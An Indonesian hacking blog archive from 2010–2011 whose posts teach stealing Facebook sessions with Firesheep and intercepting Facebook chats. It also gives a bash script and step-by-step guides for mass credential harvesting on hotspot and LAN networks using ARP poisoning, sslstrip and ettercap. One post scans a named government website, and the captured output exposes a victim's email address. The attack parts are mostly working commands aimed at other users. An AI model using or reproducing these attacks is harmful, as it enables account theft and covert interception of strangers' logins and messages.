Polisi Belajar nge Blog...

Free Premium Script www.indowebmart.com

mozartklik — Mon, 28 Feb 2011 13:50:03 +0000

Iseng bantuin kasi backlink ke situs indowebmart , apakah terindeks cepat di google…??? http://indowebmart.com

cek besok disini : http://www.google.co.id/search?q=indowebmart

Melihat email pengguna facebook yang terprivasi

mozartklik — Fri, 28 Jan 2011 01:46:50 +0000

Berbekal tutorial yang dibagikan sama aciz aka ninj4 ( http://www.facebook.com/note.php?note_id=490595996085&id=176432934603 ) tentang bagaimana melihat email teman facebook yang memprivasi infonya agar alamat emailnya tidak di tampakkan untuk orang lain, kita inisiatif bikin videonya, bukan untuk show off atau apa… cuman update blog

Pencurian akun facebook dengan firesheep

mozartklik — Sat, 25 Dec 2010 12:19:28 +0000

nah mungkin dah banyak yang tau nih… berikut video tutor cara mencuri akun facebook dengan memanfaatkan addons firefox bernama firesheep, addons ini memanfaatkan kelemahan penggunaan cookie pada facebook, maka dengan addons ini kita bisa masuk ke akun fb orang lain yang satu jaringan dengan kita dan sedang membuka fb dengan otoritas sessions cookie.. boleh di kata cookie hijacking maybe.. h h h h h video tutornya di bawah…. kalau mau install firesheep… disini

Menyadap chatting facebook dalam jaringan

mozartklik — Sat, 25 Dec 2010 11:20:49 +0000

Sebelumnya Greetzzz buat http://deadc0de.or.id dan http://devilzc0de.org sebagai sumber referensi utama saya…. di tulisan ini….
di video ini kita praktekkan bagaimana melakukan penyadapan dalam jaringan, khususnya pengguna facebook, karena kita akan melakukan penyadapan chatting facebook…. tutorial ini sangat mudah untuk di ikuti, apalagi nuibi seperti saya yang kadang-kadang begtu rumit dalam penggunaan tools – tools dalam sistem operasi unix / linux, software yang kita pakai disini adalah IMMonitor facebook spy, tools ini shareware alias tidak gratis, tapi kalau ingin mencoba dikasih waktu trial selama 10 … , cara penggunaannya pun sangat mudah, mulai ari download, kemudian install kemudian di jalankan, nah untuk setting dan hasil yang di munculkan ada nih sya ikutkan dalam video….

oh iya sekali lagi, kita bukan mau ngajarin yang tidak-tidak, kita cuman memberikan gambaran dalam sisi lain IT lifestyle, jadi jangan di hubung-hubungkan dengan institusi segala h h h h , kita cuman memberikan gambaran POC alias proof of concept begitu rentannya keamanan dari sisi IT itu sendiri, buat yang udah nonton gak usah jadi paranoid segala, yang penting bagaimana mengimplementasikan berinternet sehat dalam kehidupan sehari-hari,

DOWNLOAD IMMonitor Facebook Spy

Mengamankan file rahasia

mozartklik — Sat, 25 Dec 2010 06:31:37 +0000

Kesempatan ini kita tunjukkan bagaimana mengamankan file-file rahasia agar suatu hari tidak mudah di buka atau di sabotase oleh tangan-tangan tidak bertanggung jawab, aspek sekuritas menjadi prioritas saat ini, betapa tidak di pandang dari sudut aspek keamanan kita tidak ingin terjadi hal-hal seperti yang dialami”ariel” peterpan, yang begitu sembrono membiarkan file-file pribadinya tidak diamankan sama sekali, sehingga pada hari ini kita lihat apa yang terjadi kemudian, kita memang mungkin bukanlah orang tenar yang perlu sebegitu paranoidnya mengamankan data, namun kadang hal-hal spesifik harus lebih di perhatikan sisi keamanannya, untuk kebaikan masa mendatang dan keperluan atas aspek dari berbagai sisi…

autosniff network bash script

mozartklik — Tue, 14 Dec 2010 08:50:43 +0000

berbekal dari tulisan http://blackpolri.wordpress.com/2010/12/01/mass-sniff-via-network/ mari kita membuat script sederhana dari tutor itu dan kita kembangkan, teman-teman boleh mengubah isi script, jangan lupa mengedit secara manual etter.conf di /etc/etter.conf, kemudian jangan lupa untuk menginstall tcpxtract sebelum menjalankan script ini, (apt-get install tcpxtract),

#!/bin/bash
#
TERM=xterm
echo “|> gambar akan di ekstract dari pcap file, pastikan tcpxtract terinstal”
echo -n “|> Interface yg digunakan? contoh wlan0 : “
read -e IFACE
echo -n “|> IP Gateway – Biarkan kosong untuk Sniff seluruh jaringan : “
read -e ROUTER
echo -n “|> Target IP – Biarkan kosong untuk Sniff seluruh jaringan : “
read -e VICTIM
echo “Melakukan konfigurasi”
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
$TERM -e “sslstrip -a -k -f” &
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000 &
urlsnarf -i $IFACE | grep http > /root/URLSNARF.txt &
echo 1 > /proc/sys/net/ipv4/ip_forward &
$TERM -e “ettercap -T -q -i $IFACE -w /root/ettercap.pcap -M arp /$ROUTER/ /$VICTIM/”
tcpxtract -f /root/ettercap.pcap
killall sslstrip
killall python
killall urlsnarf
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
exit 0

silahkan di save pakai nama apa saja, entah itu pakai ahiran sh atau tidak usah, yg jelas pakai backtrack itu sudah disesuaikan, kalau pakai distribusi linux lain, install dulu dsniff, ettercap, sslstrip dlll, ikuti sja scriptnya gan.

setelah itu jangan lupa kasi permision dengan perintah chmod +x

cara menjalankan tinggal ketik

./sniff.sh kalau disimpan dengan nama sniff.sh

whatweb tools identifikasi jenis web

mozartklik — Wed, 01 Dec 2010 12:35:30 +0000

Kebanyakan kendala bagi para penetretion tester website aplication pemula seperti saya adalah bagaimana mengidentifikasi jenis website yang di gunakan oleh target, nah meskipun sebenarnya tools ini sudah lama tapi pengembangannya selalu terupdate sehingga tools ini patut untuk diacungi jempol, selain ketepatannya mengidentifikasi jenis website yang digunakan, serta dukungan 250 plugin yang setiap saat tersedia untuk di update. whatweb “Next generation web scanner. Identify what websites are running.” begitu kata sang developer (http://www.morningstarsecurity.com/research/whatweb) yah sbenarnya tidak berlibahan sih… mari kita langsung praktekkan di situs http://gowakab.go.id

root@deadc0de:/pentest/enumeration/www/whatweb# ./whatweb http://www.gowakab.go.id
ERROR: Plugin Tag-Hash failed. can’t convert nil into String
http://www.gowakab.go.id [200] AdobeFlash, AtomFeed[/index.php?format=feed&type=rss], Cookies[3bdaea873d9436e3bc8b08843ec78061], RSSFeed[/index.php?format=feed&type=rss], PasswordField[passwd], HTTPServer[Apache], MetaGenerator[Joomla! 1.5 - Open Source Content Management], Joomla[1.5][com_content,com_jevents,com_mailto,com_phocagallery,com_phocaguestbook,com_qcontacts,com_remository,com_user], Title[..: Situs Resmi Pemerintah Kabupaten Gowa :..], Footer-Hash[4c3c127f5008f5c822448ab384f1f30c], Div-Span-Structure[08b46edb8d8d6d7c4ea3f3c743eaf428], Header-Hash[7399f2299f63e855f4fe6e36c48726c9]
root@deadc0de:/pentest/enumeration/www/whatweb#

dan hasilnya kurang dari 10 detik saja, tools sudah memberikan info bahwa jenis aplikasi website yang digunakan http://gowakab.go.id adalah content management system joomla versi 1.5 dan berbagai info tambahan lainnya.

tertarik…???

DOWNLOAD WHATWEB.tar.gz (linux only)

Mass Sniff Via Network

mozartklik — Wed, 01 Dec 2010 09:01:57 +0000

ALAT & BAHAN :
- Komputer dengan OS Linux ( Di rekomendasikan menggunakan Backtrack soalnya semua tools yang di butuhkan sudah komplit )
- SSLstrip (http://www.thoughtcrime.org/software/sslstrip/)
- Ettercap (http://ettercap.sourceforge.net/)

seperti ditulisan sebelumnya http://blackpolri.wordpress.com/2010/11/22/panen-password-di-area-hotspot/, tapi kelemahan di tutorialnya menurut saya yang rakus ini adalah korban hanya 1 saja, yakni kita hanya mampu melakukan penyadapan hanya terbatas pada satu target saja, kira-kira bagaimana ya, caranya agar supaya target kita tidak terbatas pada 1 komputer saja tapi seluruh komputer yang aktif dalam jaringan yang sama dengan kita???

di konsole kita ketikkan perintah :

root@deadc0de:~# nano /etc/etter.conf

untuk melakukan editing konfigurasi ettercap menggunakan editor nano,pada bagian priv saya ubah nilainya menjadi 0, agar ettercap melakukan tugasnya dengan bersih,

Code: Select all
[privs]

ec_uid = 0 # nobody is the default 65534

ec_gid = 0 # nobody is the default 65534

kemudian dibagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command

Code: Select all
# if you use iptables:

redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $

redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$

nah, cukup pada bagian konfigurasi ettercap, kita tutup dan save dengan menekan CTRL + x kemudian memilih Y dan ENTER, kemudian melakukan setting pada firewall kita agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS korban ke HTTP, dengan perintah

root@deadc0de:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

selanjutnya kita aktifkan sslstrip di tab konsole baru dengan perintah

root@deadc0de:~# sslstrip -a -k -f

berikutnya adalah mengaktifkan ettercap di tab baru, ebagai penjaring password dan alat untuk melakukan poisoning ARP, dibagian inilah yang membedakan antara sniffing 1 target dan sniffing massal, dengan perintah

root@deadc0de:~# ettercap -T -q -i eth0 -M ARP // //

dimana opsi -i eth0 adalah opsi untuk memilih jenis interface yang kita gunakan, saya menggunakan koneksi sambungan LAN, jdai saya menggunakan interfaces eth0 yang di dapatkan dengan perintah iwconfig

Selanjutnya bagian vital yang tidak boleh kita lupakan adalah ip_forward dengan perintah di TAB konsole baru untuk menghindari kesalahan yang sering terjadi pada saat memberikan perintah ini di awalan sebelum konfigurasi pada firewall:

root@dead0de:~# echo 1 > /proc/sys/net/ipv4/ip_forward

nah… cukup sampai disini, untuk memonitoring apakah sniffing kita berhasil, tunggu sampai ada user yang melakukan login, dan pastikan jangan menutup semua tab tadi, itu yg perlu diingat, letak hasil password dan username yang terjaring berada di tab tempat menjalankan ettercap….

Backtrack R2 code name “nemesis” telah tersedia

mozartklik — Tue, 23 Nov 2010 12:25:37 +0000

setelah sukses menghadirkan distro khusus untuk para penetration tester, dan dengan dukungan sistem yang berbasis debian, kini backtrack hadir dengan wajah baru, Backtrack R2 codenamed “nemesis”. sebenarnya rilis publik tergolong cukup cepat bahkan sangat cepat, perasaan kemarin baru 2 bulan yang lalu saya mengunduh dan menggunakan backtrack R1 sebagai primary OS saya, hari ini muncul lagi dengan versi R2 nya dengan berbagai perubahan dan perbaikan serta kompatibilitas hardware.

namun pengguna backtrack versi lama tak perlu bersusah – susah untuk mendownload ulang versi R2 ini, secara ukuran download ekstensi ISO distro ini cukup besar, 2 GB lebih.. jadi pengguna yang telah sebelumnya menginstall versi 4 final atau R1, tinggal mengetikkan di konsole

root@bt# apt-get update  && apt-get dist-upgrade
root@bt:~# apt-get dist-upgrade
root@bt:~# apt-get install linux-image-2.6.35.8
jika muncul pertanyaan untuk mengupdate lsb-realese ketik Y
Configuration file `/etc/lsb-release'
 ==> Modified (by you or by a script) since installation.
 ==> Package distributor has shipped an updated version.
   What would you like to do about it ?  Your options are:
    Y or I  : install the package maintainer's version
    N or O  : keep your currently-installed version
      D     : show the differences between the versions
      Z     : background this process to examine the situation
 The default action is to keep your current version.
*** lsb-release (Y/I/N/O/D/Z) [default=N] ? y
kemudian muncul layar biru dengan tulisan "configuring linux image..." pilih NO
kemudian muncul tulisan "what would you do with menu.lst" Pilih install_new

perintah diatas akan secara otomatis memperbaharui sistem lama anda. lumayan sih dari pada mengunduh ISO sebesar 2 GB.

Info lebih lanjut : Linux-Bactrack

Panen Password di area hotspot

mozartklik — Mon, 22 Nov 2010 10:22:47 +0000

Isi konten artikel ini sebagai panduan pada kegiatan yang diadakan deadc0de goes to school, di materi ini tentang bagaimana melakukan penyadapan dalam jaringan publik baik itu wifi seperti area hotspot yang banyak ditemukan di makassar, maupun lan,seperti pada jaringan warnet dalam kaitannya tentang bagaimana mengcapture atau menangkap data-data komunikasi SSl (transport secure layer) sehingga pada hasil ahir yang kita dapatkan adalah menangkap username maupun password client dalam jaringan, nah dibawah ini adalah langkah-langkah yang kita lakukan :

Semua tools yang saya gunakan disini sudah terinclude di sistem operasi Backtrack RC1

di konsole kita ketikkan perintah :

root@deadc0de:~# nano /etc/etter.conf

untuk melakukan editing konfigurasi ettercap,pada bagian priv saya ubah nilainya menjadi 0, agar ettercap melakukan tugasnya dengan bersih,

[privs]

ec_uid = 0 # nobody is the default 65534

ec_gid = 0 # nobody is the default 65534

kemudian dibagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command

# if you use iptables:

redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $

redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$

nah, cukup pada bagian konfigurasi ettercap, kita tutup dan save dengan menekan CTRL + x kemudian memilih Y dan enterselanjutnya kita aktifkan IP Forward dengan perintah

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian melakukan setting pada firewall kita agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

root@bt:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

nah bagian berikutnya adalah melakukian proses scanning jaringan, untuk mengetahui ip adress yang hidup, saya mengasumsikan telah melakukan scanning dengan nmap dan mendapatkan calon target yang mempunyai ip address 192.168.1.10 dimana ip gateway jaringan saya adalah 192.168.1.1
Untuk melakukan aksi saya, pertama-tama saya akan melakukan spoofing ARP dalam jaringan dengan perintah

root@bt:~# arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1

dimana opsi -i wlan0 adalah opsi untuk memilih jenis interface yang kita gunakan, wlan0 adalah jenis interface wireless saya, untuk melihat jenis interfaces yang kita gunakan, cukup memberi perintah “iwconfig”, arpspoof adalah salah satu tehnik dasar dalam serangan MITM untuk mengubah traffick komunikasi dalam jaringan.selanjutnya kita aktifkan sslstrip di tab konsole baru dengan perintah

root@bt:~# sslstrip -a -k -f

berikutnya adalah mengaktifkan ettercap di tab baru dengan perintah

root@bt:~# ettercap -T -q -i wlan0

contoh hasil di tab 3 atau screen ettercap dari praktek sniffing ini

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0… (Ethernet)

wlan0 -> 00:22:43:90:24:50 192.168.1.3 255.255.255.0

Privileges dropped to UID 0 GID 0…

etter.dns:41 Invalid ip address
etter.dns:42 Invalid ip address
etter.dns:43 Invalid ip address
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Starting Unified sniffing…

Text only Interface activated…
Hit ‘h’ for inline help

HTTP : 66.220.147.31:443 -> USER: dedythytie@gmail.com PASS: “sengaja dihilangkan karena alasan keamanan” INFO: http://www.facebook.com/